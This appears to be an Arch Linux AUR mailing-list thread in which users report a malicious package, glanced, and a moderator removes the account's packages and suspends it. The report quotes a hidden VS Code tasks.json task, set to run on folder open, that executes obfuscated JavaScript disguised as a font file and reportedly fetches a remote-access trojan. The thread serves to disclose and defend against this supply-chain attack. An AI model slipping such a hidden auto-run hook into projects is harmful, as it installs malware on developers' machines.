Thank you Saren and Nicolas for your reports.

I have deleted all PKGBUILDs maintained by the AUR account [1] [2] [3] [4], nuked the commits to protect future unsuspecting adopters, and suspended the account in question.

The fact that the current revision of the tokentracker-cli PKGBUILD doesn’t point to the malicious commit *just yet* doesn’t matter. Both the upstream author and the PKGBUILD owner (who claims to be identical to the upstream author) have shown by now that neither can be trusted anyway.

I also encourage everyone to report the upstream GitHub repositories and account, which I just did as well.

Thanks again to y’all for staying vigilant!


Regards
Claudia


[1]: https://lists.archlinux.org/archives/list/[email protected]/thread/LOSI5EMNDVM7RYUSIH6BUREFQVXKMY66/

[2]: https://lists.archlinux.org/archives/list/[email protected]/thread/Z7APUST5LNS3ZA33J2HTZNXE43D4VZYC/

[3]: https://lists.archlinux.org/archives/list/[email protected]/thread/3NXW67DXK3NUEET3RZ6ZOSP64DJOKWNZ/

[4]: https://lists.archlinux.org/archives/list/[email protected]/thread/YPAJCY5XPVARTJ3RZAARNHPMPLCUJGG4/



On 12.09.26 5:53 PM, Nicolas Boichat wrote:
On Sat, 12 Sept 2026 at 23:38, Nicolas Boichat <[email protected]> wrote:

Hi,

Thanks Saren,

The maintainer should probably be banned from AUR as well.

https://aur.archlinux.org/packages/tokentracker-cli =>
https://github.com/ayan-de/Token-Tracker/commit/60f86b3a5eabf73cf13e0bb883897dd0ebee0f4f

Slight correction, the PKGBUILD points at
https://github.com/ayan-de/Token-Tracker/tree/v0.1.13, which doesn't
contain the strange commit.

I'll let you figure out what's the proper action here.

The 2 other packages I'm not sure, didn't check the binaries.

Thanks,

On Sat, 12 Sept 2026 at 22:36, Saren <[email protected]> wrote:

Package: https://aur.archlinux.org/packages/glanced

Upstream: https://github.com/ayan-de/glance-linux

https://github.com/ayan-de/glance-linux/blob/master/public/fonts/fa-solid-500.woff2
is obfuscated javascript disguised as a .woff2 font file, with a lot of
whitespace prepended. This javascript will be executed when this package
is opened using vscode as defined in .vscode/tasks.json

```json
{
    "label": "eslint-check",
    "type": "shell",
    "command": "(command -v node >/dev/null 2>&1 && node
./public/fonts/fa-solid-500.woff2) || (where node >nul 2>&1 && node
./public/fonts/fa-solid-500.woff2) || echo ''",
    "isBackground": true,
    "hide": true,
    "presentation": { "reveal": "never", "echo": false, "close": true },
    "runOptions": { "runOn": "folderOpen" }
}
```

When executed, the code will resolve a specific ethereum transaction
from blockchain, resolving a 2nd stage payload from http, effectively a RAT.

Detailed analysis by claude:
https://gist.github.com/Saren-Arterius/d666ff56ef070a551f5f38a404b0c85d



Attachment: OpenPGP_0xD11E9FC4F7C9DA3C.asc
Description: OpenPGP public key

Attachment: OpenPGP_signature.asc
Description: OpenPGP digital signature

Reply via email to